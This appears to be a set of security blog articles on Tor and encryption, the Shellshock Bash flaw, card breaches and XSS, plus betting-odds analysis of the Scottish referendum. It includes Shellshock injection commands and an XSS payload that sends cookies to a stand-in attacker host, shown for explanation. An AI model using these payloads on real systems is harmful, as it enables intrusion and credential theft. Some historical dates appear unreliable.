Two Sides of the Argument: For Every Snowden there’s a Dread Pirate Roberts

Introduction

The battle between the civil right to privacy and the right of society to protect itself shows no signs of abating, with the FBI saying that it is concerned about Google and Apple’s move to encrypting data by default. Unfortunately, we created file systems and file content types with little thought about keeping things private, and where systems were often viewed as stand-alone machines. We also created an Internet which is full of the same protocols that we used in the days of text terminals and mainframe computers, where users typed in commands to access data, and where there was little thought about protecting the data as it is stored, analysed and transmitted. As we become increasingly mobile, we now carry around sensitive data that was once protected behind physical firewalls, and the risks to our data increase by the day. To address this, Apple has just released its file encryption system for iOS 8, and Google plans to do the same for the next version of Android.

The FBI, though, sees the status quo as a way of investigating criminals and terrorists, and can see this opportunity reducing with encryption-by-default, such as the file encryption system used in Apple’s iOS 8. With iOS 8, Apple itself holds no encryption keys, which sits uneasily with current laws that force users to reveal their encryption keys when requested by law enforcement investigators. This could mean that users find themselves breaching current laws in both the US and the UK. The same battle exists with Tor, where law enforcement fears that crime can go unnoticed, while privacy advocates promote the right to privacy that Tor provides. There is thus a battle that ranges from the file system to the data transmitted over the Internet.

Exception to the 5th Amendment Right

In the UK, citizens have the right to silence (similar to the Fifth Amendment right in the US, related to the right against self-incrimination), but there is an exception related to encryption keys, covered by Section 49 of RIPA, and the failure to reveal encryption keys can often be seen as a sign that someone has something to hide. The move by Apple and Google may thus conflict with the law, as encryption keys must be handed over when required. This was highlighted in 2014 when Christopher Wilson, from Tyne and Wear, was jailed when he refused to hand over encrypted passwords related to investigations into an attack on the Northumbria Police and the Serious Organised Crime Agency’s websites. He handed over 50 encrypted passwords, but none of these worked, so a judge ordered him to provide the correct one; after failing to do this, he received a jail sentence of six months.

In 2012, Syed Hussain and three other men were jailed for discussing an attack on a TA headquarters using a home-made bomb mounted on a remotely controlled toy car. Syed, who admitted having terrorist sympathies, was jailed for an additional four months for failing to hand over a password for a USB stick.

The opposing sides

As we move into an Information Age, there is a continual battle on the Internet between those who would like to track user activities and those who believe in anonymity. The recent Right to be Forgotten debate has shown that very little can be hidden on the Internet, and that deleting these traces can be difficult. The Internet, too, can be a place where crime thrives through anonymity, so there is a continual tension between the two sides of the argument, and, overall, no-one has a definitive answer as to which is correct.

To investigation agencies, access to Internet-based information can provide a rich source of data for the detection and investigation of crime, but they have struggled against the Tor (The Onion Router) network for over a decade. Its usage has been highlighted over the years, such as in June 2013, when Edward Snowden used it to send information on PRISM to the Washington Post and The Guardian. This has prompted many government agencies around the World to set their best researchers on cracking it, such as recently with the Russian government offering $111,000.

At the core of Tor is its onion routing, which uses subscribers’ computers to route data packets over the Internet, rather than using only publicly available routers. One thing that must be said is that Tor aims to tunnel data through public networks and keep the transmission of the data packets safe, in a similar way to Google when you search for information (as it uses the HTTPS protocol for the search).
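
As a rough illustration of the onion idea, the following is a toy sketch (using the Python cryptography library, not the actual Tor protocol): the sender wraps the message in one layer of encryption per relay, and each relay can only strip its own layer and learn the next hop.

# Toy sketch of onion routing: one encryption layer per relay (not the real Tor protocol).
from cryptography.fernet import Fernet

relay_keys = [Fernet.generate_key() for _ in range(3)]   # keys for relays 1..3

# The sender wraps the message inside-out, so relay 1 peels the outermost layer.
onion = b"GET /page HTTP/1.1"
for key in reversed(relay_keys):
    onion = Fernet(key).encrypt(onion)

# Each relay removes exactly one layer; only the last one sees the plaintext request.
for i, key in enumerate(relay_keys, start=1):
    onion = Fernet(key).decrypt(onion)
    print(f"Relay {i} forwards {len(onion)} bytes")
print(onion)   # b'GET /page HTTP/1.1'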

The battle of the Gods

With the right to be anonymous at its core, the Tor project created a network architecture which anonymises both the source of the traffic and the identity of users. With so many defence agencies around the World targeting Tor, the cracks have started to be exposed, in the same way as with the targeting of OpenSSL and TrueCrypt. Researchers identified an underlying flaw in Tor’s network design, which led the Tor Project to warn that an attack on the anonymity network could have revealed user identities.

This message was in response to the work of two researchers from Carnegie Mellon University (Alexander Volynkin and Michael McCord), who exploited the infrastructure. At present SEI (the Software Engineering Institute at Carnegie Mellon) has a Defense Department contract running until June 2015, worth over $110 million a year, with a special focus on finding security vulnerabilities.

Overall the attacks ran from January 2014, and were finally detected and stopped on 4 July 2014. In a similar way to the OpenSSL Heartbleed announcement, the Tor team were informed that the researchers were to give a talk at the Black Hat hacker conference in Las Vegas. The sensitivities around the area are highlighted by the fact that the talk was cancelled, as neither the university nor SEI approved it. The Tor Project, through Roger Dingledine’s blog entry of 4 July 2014, revealed that identities could have been exposed over the period of the research.

Tor

The Web leaves a wide range of traces, including user details from cookies, IP addresses, and even user behaviour (user fingerprinting). This information can be used to target marketing to users, and is also a rich seam of information for the detection and investigation of crime. The Tor network has long been a target of defence and law enforcement agencies, as it protects user identity and source location, and it is typically associated with the dark web, as this content is not accessible to key search engines such as Google. Tor can be used to bind to a server, so that the server will only talk to a client which has been routed through the Tor network, which means that search engines will not be able to find the content. This is the closed model: creating a Web which cannot be accessed by users on the open Internet, only by those using Tor. If users then trade on these dark web servers with Bitcoins, there will be few traces of their transactions.

With the Tor network, the routing is done using the computers of volunteers around the world to route the traffic around the Internet, and with every hop the chance of tracing the original source is reduced. In fact, it is rather like a game of pass-the-parcel, where players pass the parcel randomly between themselves, but where the destination receiver will eventually receive the parcel. As no-one has marked the parcel along its route, it is almost impossible to find out the route that the parcel took.

The traces of users accessing Web servers are thus confused with non-traceable accesses. This has caused a range of agencies, including the NCA and GCHQ, to invest in methods of compromising the infrastructure, especially to uncover the dark web. A strange feature in the history of Tor is that it was originally sponsored by the U.S. Naval Research Laboratory (which had been involved in onion routing). Its first version appeared in 2002, and it was presented to the world by Roger Dingledine, Nick Mathewson, and Paul Syverson, who were named, in 2012, among the Top 100 Global Thinkers. It has since received funding from the Electronic Frontier Foundation, and is now developed by The Tor Project, a non-profit organisation.

Thus, as with the right to remain private, some fundamental questions remain, and Tor is a target for many governments around the World. In 2011, it was awarded the Free Software Foundation’s 2010 Award for Projects of Social Benefit for:

"Using free software, Tor has enabled roughly 36 million people around the world to experience 
freedom of access and expression on the Internet while keeping them in control of their privacy 
and anonymity. Its network has proved pivotal in dissident movements in both Iran and more recently 
Egypt."

Figure 1 shows a Web browser application set up for Tor. It uses onion routing and also the HTTPS protocol to secure the accesses. With Tor, too, the path between the two communicating hosts is encrypted, which creates a tunnel between them. This focuses more on the security of the communication over the Internet, and less on preserving the anonymity of the user. Tor is, though, often used for proxy accesses to systems, where a user wants to hide their access.

Figure 1: Tor Web browser

Silk Road

One of the first large-scale illegal uses of the Dark Web was Silk Road (created in February 2011) by “Dread Pirate Roberts”, which was used to trade drugs on-line. In June 2011 it was pin-pointed through chatter on the Internet and increases in Web traffic, and it was taken down by the DEA and Department of Justice in the US. It has since resurfaced as Silk Road 2.0, with other similar sites appearing, along with encrypted versions of the site’s code being created so that it can be redistributed elsewhere if it is taken down. This approach is equivalent to self-healing Web sites, which rebuild themselves when they are attacked; in this case, a human helper will normally be involved in re-creating the site.

While Tor was created for all the best of reasons, from another point of view it can be seen as a place where criminals can build their businesses in the Cloud, and where there can be few traces left of their activities. Overall it is an impossible debate to say exactly which is the right approach: from a law enforcement point of view there are problems in investigating sites bound into the Tor network, but it is also a place where citizens have the right to privacy.

Conclusions

With data breaches rising by the day, such as the 150 million passwords cracked from the Adobe infrastructure and over 120 million credit card details skimmed from Home Depot and Target, Apple and Google feel they have to build up trust with the users of their operating systems. For this they are looking at encryption-by-default, where they encrypt file data (which is now stored on flash memory), and which may now conflict with the laws around revealing encryption keys. At one time, investigators could extract the memory from the device and decode its contents, but without the encryption keys this will be difficult. While Google and Apple have not responded to the dilemma, there could be opportunities for them to work with investigators to overcome some of the issues, though this might reduce the privacy protection on user data. Unfortunately, if they do reduce the security of the encrypted data, they may leave open opportunities for others to learn the methods, and compromise the whole system. In the corporate market, Microsoft BitLocker is one of the most popular methods used for full disk encryption; with this, there is always a back-door into the encrypted data, as the encryption keys can be stored within the domain controller for the company.

As yet, neither Google nor Apple has made any comment about the issues that their encrypted file systems could cause mobile phone users.

Shellshock – It is serious, but it is no Heartbleed

Introduction

After years of Microsoft Windows vulnerabilities, we find that the new place for vulnerabilities is sloppy programming in Java, Adobe Flash and Adobe Reader, and now Linux, where a common denominator is often the C and C++ programming languages. The target this time is not desktops, but Linux servers using Bash (the GNU Bourne Again Shell), which is the command line interpreter used in many Linux-based systems, including Apple OS X. The most significant recent vulnerability was Heartbleed (CVE-2014-0160), which allowed an intruder to send a heartbeat request within secure communications with a Web server (using HTTPS), and have the server return the contents of its running memory. This revealed things such as usernames, passwords and encryption keys. While a serious problem, Shellshock is in no way as serious as Heartbleed, which had the potential to crack open most of the secure communications on the Internet, and provide a large-scale method to reveal secret information.

Whenever a new vulnerability is discovered it is assigned a CVE number, which is CVE-2014-6271 for Shellshock. Once it was announced, new patches were rolled out, but these still do not seem to fix all the problems, including a secondary problem: CVE-2014-7169 (which is less severe). Administrators of Linux systems, though, are advised to patch their systems now, and not wait for a fix for CVE-2014-7169.

Bash interprets the commands that users enter, or that are run from scripts, and then makes calls to the operating system, such as for running programs, listing the contents of a directory, or deleting files. The discovered flaw allows intruders to remotely run arbitrary code on systems such as Linux servers, including web servers, routers, and many embedded systems. It was discovered by Stephane Chazelas of Akamai, who found that code placed after a function definition in an exported environment variable is run whenever a new Bash shell is started. Many Linux programs use environment variables to pass parameters between programs, and the flaw thus allows code to be injected into a program whenever these environment variables are processed.

It should be noted that although the opportunity for exploit is large, especially on embedded devices, the security on the system needs to be low in order for it to be exploited.

Shellshock

While Heartbleed was a serious vulnerability, where the memory of a server could be viewed, Shellshock mainly affects CGI scripts. These are old-fashioned scripts that allow commands to be processed using a scripting language. While popular in the past, they have largely been replaced by PHP and other higher-level scripting languages. In most cases CGI scripts reside in the /cgi-bin folder. For GNU Bash through 4.3, trailing strings after a function definition are processed in the definitions of environment variables, which allows intruders to execute arbitrary code. For example, we define a function named mybugtest:

billbuchanan@Bills-MacBook-Pro:/tmp$ export mybugtest='() { :;}; echo I AM BUGGY'
billbuchanan@Bills-MacBook-Pro:/tmp$ bash -c "echo Hello"
 I AM BUGGY
 Hello

It is in no way as serious as Heartbleed, and on a well-secured server it is unlikely that the intruder can do any real damage to the system. The attack works by injecting a payload of code into the environment variables of a process to be started. When the process starts, the code is executed within the running program, in much the same way as if a user had typed it in as input.
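
A minimal sketch of that injection route follows (the header name and payload are purely illustrative): a web server typically copies HTTP request headers into environment variables before invoking a CGI script, so a crafted header reaches Bash as an exported “function” definition.

# Sketch of the Shellshock CGI vector: an attacker-controlled HTTP header is copied into
# an environment variable, which a vulnerable Bash executes when it starts up.
import subprocess

payload = "() { :;}; echo SHELLSHOCKED"          # illustrative header value
env = {"PATH": "/usr/bin:/bin", "HTTP_USER_AGENT": payload}

# A patched Bash prints only "hello"; an unpatched one prints "SHELLSHOCKED" first.
result = subprocess.run(["bash", "-c", "echo hello"],
                        env=env, capture_output=True, text=True)
print(result.stdout)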

The code which appears at the end of the Bash function can be fairly complex, and allows an intruder to inject commands into the shell (and thus into running programs). In this example we copy some text into a text file (named newfile) and then copy that file to a new file (newfile2):

$ export mybugtest='() { :;}; echo "This is my new file..." > newfile; cp newfile newfile2'
$ bash -c ""
Segmentation fault: 11
$ ls newfile*
newfile   newfile2
$ cat newfile2
This is my new file...

In this case we could move files around, but we couldn’t move a file to a privileged folder, as that would need administrator rights. In a well-secured environment, the damage that Shellshock can cause should be minimal, as most of the important operations require a higher-level privilege. It is this attribute of Shellshock that highlights that this is not another Heartbleed, as Heartbleed allowed anyone to access a privileged area of memory on the server, without any restrictions. While Web servers with a limited usage of cgi-bin scripts (which give scripted access to the system) may be relatively safe, there may be risks with poorly secured embedded systems, which often use scripts to set up their services.

Buffer overflows and underruns

The flaw within Bash shows how sloppy software development has been in the past; it is a flaw which existed for over 25 years without being discovered. Many of the problems being uncovered have been caused by poor software coding in C and C++, which often allows programs to act incorrectly when the input data is not formatted as expected. One common method of exploiting such a program is a buffer overflow, where a certain amount of memory is allocated to a variable, and the user enters more data than the allocated memory can hold, causing other parts of memory to be overwritten and the program to act incorrectly.
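
As a rough illustration (Python’s ctypes standing in for the C memory model), writing more bytes than a field was allocated silently overwrites whatever sits next to it in memory:

# Illustration of a buffer overflow: an unchecked copy into an 8-byte field spills over
# into the adjacent field (ctypes is standing in for the C memory layout here).
import ctypes

class Record(ctypes.Structure):
    _fields_ = [("user_input", ctypes.c_char * 8),
                ("is_admin",   ctypes.c_char * 8)]

rec = Record(b"alice", b"no")
overlong = b"AAAAAAAA" + b"yes\x00" + b"xxxx"     # 16 bytes of "user input"

# Copying 16 bytes into the 8-byte user_input field overwrites the neighbouring flag.
ctypes.memmove(ctypes.addressof(rec), overlong, len(overlong))
print(rec.is_admin)    # b'yes': adjacent memory has been corrupted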

In the case of Heartbleed it was a buffer over-read (often described as an underrun of the supplied data) which caused the problem, where the reply was filled from an area of memory which the request had not actually supplied with data, so the response was padded out with adjacent memory, including secrets.

Conclusions

In no way is this another Heartbleed, which truly was a major problem, where any intruder could run a simple exploit against any affected server and have its memory released. There is the possibility of an injection of remote code, but the risks are in no way as bad as Heartbleed.

At one time, many Linux systems used CGI scripts extensively, but these were often difficult to read and update, so they have been migrated away from in favour of newer languages, such as C#, Java, C++, ASP and PHP. Administrators should examine their /cgi-bin folders and make sure there are no vulnerable scripts in there, and, at the very least, patch their systems.

The key difference between Heartbleed and Shellshock is that ANYONE in the World could exploit Heartbleed, just by sending malicious network packets to remote servers, where virtually every Linux-based Web site ran the OpenSSL library which made them vulnerable. With Shellshock, the remote user needs to be given access to scripts running in the cgi-bin, and high-level rights, for the system to be vulnerable. If the system is well protected, everything should be okay; for Heartbleed, there was no protection, and the Internet shook at its core for a few weeks.

 

Passwords and Credit card details – Shooting Fish in a Barrel

Introduction

Imagine if all the banks in the UK decided to send out new credit cards to all their customers, but they were all lost in the post, and all the details ended up for sale on a Web site on the Internet. Well, the recently discovered Home Depot hack had a similar scope, where at least 56 million credit and debit card details could have been compromised from all of its 2,200 stores in the United States, and possibly from its 287 stores in Canada, Guam, Mexico, and Puerto Rico. It is thought that the US and Canadian stores were the most at risk.

The risks around intruders stealing passwords and credit cards show no signs of abating, with the announcement that Home Depot point-of-sale terminals had a malware agent installed on them, which could have resulted in over 56 million credit and debit card details being stolen. The Home Depot hack looks to have exceeded the recent Target hack, which exposed an estimated 40 million cards. Overall the main problem seems to be that companies have set up a whole lot of back-end defences, but have forgotten that once an intruder has a touch-point in the network, they can often go undetected.

Along with the risks around point-of-sale devices, the risks around XSS (Cross-site Scripting), caused by sloppy coding, also show no signs of abating, and the recent e-Bay hack and the 1.2 billion usernames and passwords stolen show that there are significant risks in the way that e-Commerce infrastructures have been created.

e-Bay hack

e-Bay was recently exposed as having a problem where customers are tricked into handing over their personal data. With this, a non-malicious account is hijacked and used to set up a fake listing, each of which typically has 100% positive feedback and many associated sales. Users of the compromised account typically find themselves locked out of their account, and are later billed for selling fees. This problem has existed since February 2014, and many experts reckon that it still exists on the site.

The compromised account then creates a link to a fake e-Bay page, with code injected into the e-Bay page, where the buyer is asked for their login and bank account details. As far as the buyer can see, it is a valid e-Bay page, just asking for their details to confirm the purchase. Unfortunately it uses JavaScript and Flash injection to fake the site, and the data entered is sent to the intruder. As far as the buyer is concerned, everything is coming from e-Bay. This is all done through that classic “shooting fish in a barrel” method: cross-site scripting (XSS).

An example of how XSS works is given in the following demonstration:
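
This is a minimal sketch (hypothetical code, not e-Bay’s actual pages): user-supplied text is placed into the page without escaping, so an attacker can supply script which then runs in the victim’s browser, while escaping the input closes the hole.

# Minimal sketch of a reflected XSS flaw (hypothetical listing page, not e-Bay's code).
import html

def render_listing_vulnerable(title: str) -> str:
    # User input dropped straight into the page: any <script> in it will run.
    return f"<h1>Item: {title}</h1>"

def render_listing_safe(title: str) -> str:
    # Escaping turns the payload into harmless text.
    return f"<h1>Item: {html.escape(title)}</h1>"

payload = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
print(render_listing_vulnerable(payload))   # the script tag survives and would execute
print(render_listing_safe(payload))         # &lt;script&gt;... is displayed, not executed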

Home Depot exploit

For the Home Depot exploit, intruders installed malware at the point-of-sale, similar to the recent Target hack, in order to collect customer data from the cash registers. It is likely that this ran from April 2014 to the beginning of September 2014, before it was finally detected. The company has just announced that it has now got rid of the malware, but this is little comfort to the customers who have already had their credit card details compromised.

The lesson learnt must be to try to reduce the time it takes to detect a threat, and to respond to it quickly. As the back-end financial services become more secure, hackers will focus more on the point-of-sale, and thus retailers such as Home Depot need to spend as much effort on detecting exploits as they do on data protection.

Overall it is expected that the breach will cost Home Depot at least $62 million, showing that money spent on detection and prevention in security is often a good investment. A brand can also be damaged by a loss of respect from customers: the hack against the Sony PlayStation Network, for example, is thought to have cost Sony $170 million in direct costs, and led to major damage to their brand.

History repeats with a new Target

The Home Depot hack is likely to be greater than the preceding Target hack, which resulted in a large number of credit and debit card details appearing on the credit card clearing house site rescator.cc. From the Target attack, there have been batches named “American Sanctions” and “European Sanctions”, and some speculate that this was retribution for penalties imposed by the West on Russia for its actions in Ukraine.

Stolen card data on Rescator.cc (Figure 1) can command prices of up to $100 for each credit card’s details, and it has become one of the largest clearinghouses for breaches, with many hundreds of thousands of cards being sold in a single batch. It can be seen from the meta tags on the site that they buy and sell credit card details, including CVV details:

<title>Rescator.CC - Buy Dumps Shop & Credit Cards with cvv2</title>
<meta name="keywords" content="dumps shop, credit cards cvv, credit cards cvv2, 
dumps, dumps with pin, cvv2, buy dumps, buy credit cards, buy creditcard, buy cvv, 
buy cvvs, d+p, sell dumps, buy dumps, buy cvv, buy cvv2, sell dumps, sell track2, 
buy track2, buy cards, cheap cvv, buy cvv, sell cvv, fresh cvv, good cvv, buy 
good cvv, sell good cvv, best cvv, check cvv, cvv2 dump, buy cvv online, sell cc, 
dump shop" />
<meta name="description" content="Buy Dumps Shop of Superior Quality. 
Track1 & Track 2. Valid rate of %90. Feedbacks on many forums.">
<script type="text/javascript">

Figure 1: Rescator.cc

If we look at the infographic from Information is Beautiful (Figure 2) related to the World’s Biggest Data Breaches, we can see that the Home Depot hack is not as large as the Adobe hack, but in scope it could be greater, as the Adobe hack just targeted usernames and passwords (150 million of them), whereas every one of the credit card details stolen from Home Depot carries the risk of major financial fraud. The Target entry (in Figure 2) shows 70 million suspected data breaches. For the Adobe hack, the Top 5 passwords used were “123456”, “123456789”, “12345678”, “password” and “adobe123”, which are about as easy to crack as having no password at all; truly shooting fish in a barrel. From the graphic we can also see the Sony hack, with 77 million records compromised in 2010.

Recently, too, it was detected that a Russian gang had stolen over 1.2 billion user names and passwords, purely by using compromised bot agents to exploit poorly written code on Web sites, using XSS (Cross-site Scripting) vulnerabilities.

Figure 2: World’s Biggest Data Breaches (brown represents an interesting story) Ref: [here]

Those who might be affected by the hack can check at https://homedepot.allclearid.com/, where Home Depot has set up a collaboration with AllClear ID, who will allocate a dedicated investigator to help recover any financial losses resulting from the hack. It covers one year from the date of the announcement (8 Sept 2014), and the Home Depot site carries a strong central message about the breach (Figure 3).

Figure 3: Home Depot site showing payment breach message

Conclusions

The “shooting fish in a barrel” analogy seems flippant, but it can be seen that as the defences have toughened up on the back-end, the real risk is now at the front-end, which is exposed to a range of environments. If each credit card detail is worth up to $100, there is thus a lucrative market out there to find new ways to shoot the fish.

While initially it was thought that the same malware had been used in the Home Depot hack as in the Target hack, it is now thought to be completely new, and previously unseen, malware, showing how malware transforms itself to overcome obstacles. With a considerable amount of money to be made from capturing credit card details, there can thus be considerable investment in creating new types of malware, enough to fund a whole R&D department on the hackers’ side.

It is amazing how quickly we have created our e-Commerce infrastructure, but we are all in danger of large-scale fraud, which damages both citizens and our economy, so we need to invest more in designing, implementing, detecting, protecting and analysing our electronic infrastructures, as every electronic device can be exposed to threats.

In terms of the e-Bay hack, it is the same old story of sloppy code, where the developer does not check user input, and where code can be injected into a page to make it work incorrectly.

Post-analysis of Scottish Independence Vote

Introduction

Over the past few weeks I have been doing some analysis of the odds around the Scottish Independence Referendum, so let’s now see how the predictions actually went.

The final average odds for a No were 1/5 (5-to-1 on), with 4/1 for a Yes vote. This seemed to go against the opinion polls at the time, so we analyse some of the trends around the predictions, and see where they got things right, and where they missed on the understanding of the dynamics. We’ll see that they basically got most things right, but missed out a bit on the head v heart analysis. They did, though, predict the result more clearly than the opinion polls did, which perhaps highlights a stronger understanding of human nature, and that highly skilled punters, too, can spot the correct odds for the current market.

Largest moves towards Yes or No

The bookies predicted that Dundee was the favourite for the strongest Yes, and so it was. In second and third place were Clackmannanshire and Glasgow. Table 1 and Figure 1 outline the results, where it can be seen that the Top 3 for the largest Yes vote in percentage terms were actually Dundee, West Dunbartonshire and Glasgow, so the bookies got No 1 and No 3 correct. Clackmannanshire, which was the first to be announced, actually ended up in 12th place. In terms of change, Inverclyde, Renfrewshire, North Lanarkshire and South Ayrshire showed the greatest changes towards a Yes, while Clackmannanshire, Angus and Moray showed a stronger move towards No; Clackmannanshire, which was 2nd favourite for the highest Yes vote, ended up in 12th place. The writing was on the wall straight after Clackmannanshire was announced, as it was a No majority for the 2nd favourite for a Yes.

If we assume anything between +3 and -3 is roughly correct, the bookies managed to predict the following: Dundee City, Glasgow, East Ayrshire, Falkirk, South Lanarkshire, West Lothian, Midlothian, Argyll & Bute, Aberdeen City, Edinburgh, East Dunbartonshire, East Lothian, East Renfrewshire, Shetland Islands, Highland, Dumfries & Galloway and Scottish Borders. So the bookies predicted more than half of the areas within this margin (17 out of 32).

They underestimated the strength of the Yes vote for West Dunbartonshire (-9), North Lanarkshire (-11), North Ayrshire (-12), Fife (-7) and South Ayrshire (-12), and underestimated the strength of the No vote for Comhairle nan Eilean Siar (+6), Stirling (+10), Perth & Kinross (+6) and Orkney Islands (+6). Orkney, which was predicted to be in 26th place, actually ended up with the strongest No vote.

Table 1: Actual result and predicted place from odds

Figure 1: Actual result and predicted place from odds (-ve shows a stronger Yes than predicted, +ve a stronger No than predicted).

So … who won Punters or Bookies? Winner: Bookies.

Head over heart?

One thing that sticks out is the vote in Aberdeenshire, which was No 9 in the most-likely-to-vote-Yes list, but ended up at No 24. What seems to have happened is that Aberdeenshire is a strong SNP area, but, perhaps, the head ruled the heart, where the relative affluence of the area overruled the strong independence focus. Angus and Moray too are strongly SNP, but have gone more with their head, as both areas are also fairly affluent. The bookies evidently predicted that the heart would rule the head in these areas, and that is why they didn’t manage to predict them in the correct position.

For heart over head, Dundee, Glasgow, and East Ayrshire were predictable; it was other West Coast areas which showed the greatest heart over head movement, including South Ayrshire moving from one of the least likely (No 31) to somewhere nearer the middle of the table. Renfrewshire and Inverclyde, though, stormed through the odds with a massive heart over head turnaround.

East v West?

Scotland is changing as a nation, and the referendum vote perhaps highlights this in relation to the changes in the odds and the results. Table 2 shows a rough split between North/South, West and East and tallies up the scores for each. It can be seen that the West scores -77 in changes, where many of the regions in the West produced stronger than predicted Yes results, while the East scores a positive value of +69. The North/South group also scores a positive value of +8.

Table 2: East, West and North/South

There are generally different demographics between the east and west of Scotland, with a migration of population from west to east. Edinburgh, for example, now has a population of 487,500 (nearly 10% of the total population of Scotland), and is growing at a rate of 1% each year. It also has a fairly young population, with 23.8% aged 16 to 29 years (as opposed to an average of 18.3% over Scotland). Midlothian, West Lothian and East Lothian have also been growing at a fairly fast rate, possibly due to the effect of a strong economy in Edinburgh, as opposed to falling populations in the West of Scotland. The areas of Moray and Angus have also seen growth due to the success of Aberdeen as a major Oil & Gas hub.

The different demographics are also highlighted by Glasgow having a life expectancy of 71.9 for males, as opposed to Edinburgh where it is 77.2. This trend is not consistent, though, with areas such as East Dunbartonshire appearing 26th out of 32, yet having an average male life expectancy of 79.4.

So who won in changing perception … East or West? East Coast.

Odds variation

The odds over the last few weeks did not reflect the opinion polls, especially in the last week or so, where No stayed around 1/4 and Yes started drifting out to 3/1, even as the polls were narrowing the gap. As the polls over the final days showed the difference between Yes and No narrowing, the bookies pushed the odds out for a Yes. Figure 2 shows the variation of the odds for a Yes vote. It can be seen that there was a good deal of variation over August and September, but the bookies ended up with a fairly consistent consensus.

As seen in Figure 3, the high point of the campaign (in terms of the Yes vote odds) was around 7 Sept, where the average odds came in to 2.78, followed by a drift out to 4.39 by 13 Sept, and a slight drift back in to 3.91, but the last two days showed a drift out. Generally the odds didn’t quite mirror the opinion polls, which tended to narrow the gap over the week before the vote:

18 Sept: 4.52 (Out)
17 Sept: 4.23 (Out)
16 Sept: 3.91 (In)
15 Sept: 4.03 (In)
14 Sept: 4.19 (In)
13 Sept: 4.39 (Out)
12 Sept: 4.06 (Out)
11 Sept: 3.49 (Out)
10 Sept: 2.78 (Out)
09 Sept: 2.85 (Out)
08 Sept: 2.82 (Out)
07 Sept: 2.78 (In)

Figure 2: Variation of No odds

Figure 3: Yes odds for the 30 days before the poll

Key breakpoints

While the betting odds were fairly robust around opinion polls, there were three key break points that drove the odds:

  • Break point 1 (Darling wins). A key change took place around the 5 August debate, where the odds for a Yes vote had been dropping before the debate, but after it the average odds for a Yes vote moved steeply up (dropping one point in the days before the debate, and then rising 1.2 over the four days after it):

9 Aug 5.75
8 Aug 5.43
7 Aug 5.05
6 Aug 5.05
5 Aug 4.54
4 Aug 4.39
3 Aug 5.5

  • Break point 2 (Salmond wins). On the day before the second debate there was a peak in the Yes vote odds of 6.3 (22 August 2014), which then fell to nearly 4 (31 August 2014). The largest changes in the odds have thus occurred around the debates, with 5 August 2014 having 31 changes (where generally the No vote odds drifted out) and nine changes on 23 August 2014. Also, typically, there is an increasing rate of change of the odds as we move closer to the vote.
  • Break point 3 (Opinion polls come together, odds drift out). In the last three days before the vote, the opinion polls were showing a coming together, with one or two showing the Yes vote winning, but the odds started to drift out for a Yes, with some bookies (Betfair) actually paying out early, and others suspending betting. The last two data points on Figure 3 show this trend.
So … who won … Opinion Polls or Bookies? Winner: Bookies.

% Share of the Vote

The opinion polls were putting the difference between Yes and No within just a few points in the last few days. The bookies, though, were still predicting 45-50% for a Yes vote, and this is where it ended up. In the end the bet for 45-50% was 2.1 (which is almost an even money bet). It can be seen from Figure 4 that the prediction was for the lower end, as the odds for 40 to 45% are much lower than those for 50-55%:

40% or less 6.8
40 to 45% 3.5
45 – 50% 2.1
50 – 55% 5.1

Figure 4: Percentage share for Yes vote

So … who won … Opinion Polls or Bookies? Winner: Bookies.

Prediction on turn-out

The best bet of all was actually related to how well the Scottish electorate did in turning out. The actual turn-out was 83.9%, which few could have predicted, and the bookies got this right in terms of the favourite at 7/4, but it was an excellent bet, as the result was nearly 9% above the lower end of the band:

>75%        7/4
70% – 75%   12/5
60% – 65%   5/2
65% – 70%   14/5
55% – 60%   23/5
<55%        23/5

So … who won … Opinion Polls or Bookies? Winner: Bookies.

Wayback

Do you want to see the odds the day before the election? Well we can look in the Wayback engine here.

Conclusions

What was surprising in the run-up to the vote was that the bookies were not reflecting the trends of the opinion polls. While the opinion polls were getting closer, the odds for a Yes were drifting out. One of them was going to be wrong, and it looks like the bookies were predicting the result more accurately, and not going with the trends in the opinion polls. This perhaps shows that bookies understand the dynamics of human nature better than targeted sampling does.

The split between east and west cannot be ignored in terms of the prediction of how they would vote, with the West showing a strong movement towards Yes, and the East, generally, away from it. Perhaps the risks around the finance sector and Oil & Gas on the East Coast made the head count for more than the heart? In the west, there seems to have been a strong pull from the heart.

Which was the best bet? Ans: the Scottish people. The bookies gave odds of 7/4 for a turn-out of more than 75%, and the turn-out ended up at 83.9%.

Further Analysis of Betting Odds for Scottish Independence Referendum


Introduction

With just one day to go to the vote, this analysis outlines the current odds, and may give some pointers to the outcome. The data used in this analysis looks back at the daily odds for a Yes vote from 23 bookmakers over the last five months (1 April – 17 September 2014).

Even on the day before the vote, there is a great deal of change, with the average decimal odds for a Yes vote at 4.3, having drifted out from 3.91 (16 September 2014). The movement isn’t quite consistent, as 14 bookmakers have lengthened their odds on a Yes vote, and six have shortened them. The No vote odds sit at 1.22, having drifted in from 1.28 (16 September 2014). A typical price is 1.22 (2/9) for No and 4 (3/1) for Yes. So at this point there is still a fairly wide gap in the odds.

Figure 1 outlines the odds for the past five months. It can be seen that the odds for a No vote are approximately where they started at the beginning of May 2014, with a large drift out at the start of September 2014, drifting back in over the last few weeks.

Figure 1: Odds on a Yes vote (using decimal odds)

Outline of odds

In the independence poll, there are only two horses in the race, so there is either a Yes or a No bet. Odds are normally defined as the fraction which defines the return, so Evens is 1/1, where for every £1 bet you will get £1 back in addition to your stake (so you get £2). If the odds are 2/1 (2-to-1 against), you get £2 back plus your stake (so you will get £3 on a win). For 1/2 (or 2-to-1 on), you get half your money back, so you’ll get £1.50 on a win. These types of odds are known as fractional odds, where the value defines the fraction for your payback. The fractional multiplier, though, does not include your stake coming back to you, so decimal odds are used to represent this: a value which is multiplied by the stake to give the total returned (basically just the fractional odds plus 1, represented as a decimal value).

The fractional odds value of Evens gives a decimal odds value of 2 (where you get £2 back for a £1 stake), 2/1 (2-to-1 against) gives 3.0, while 1/2 (2-to-1 on) is 1.5. In terms of roulette, Evens would define the odds for a bet of Red against Black (as each is equally probable); in roulette, though, the odds are slightly biased against the player for a Red v Black bet, as the 0 changes the odds in favour of the casino. For betting overall, bookmakers try to analyse the correct odds so that they have attractive ones (if they want to take the bets) against others. If they take too much of a risk, they will lose, so their odds around the independence vote should be fairly representative of the demand around bets, and the current sentiment around the debate.
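
A short helper makes the conversion concrete (a simple sketch; the example prices are the ones quoted in this article):

# Convert fractional odds to decimal odds and the probability the price implies.
from fractions import Fraction

def decimal_odds(fractional: str) -> float:
    """'2/9' -> 1.22..., i.e. the fractional odds plus the returned stake."""
    return float(Fraction(fractional)) + 1.0

def implied_probability(fractional: str) -> float:
    """Probability implied by the price, ignoring the bookmaker's margin."""
    return 1.0 / decimal_odds(fractional)

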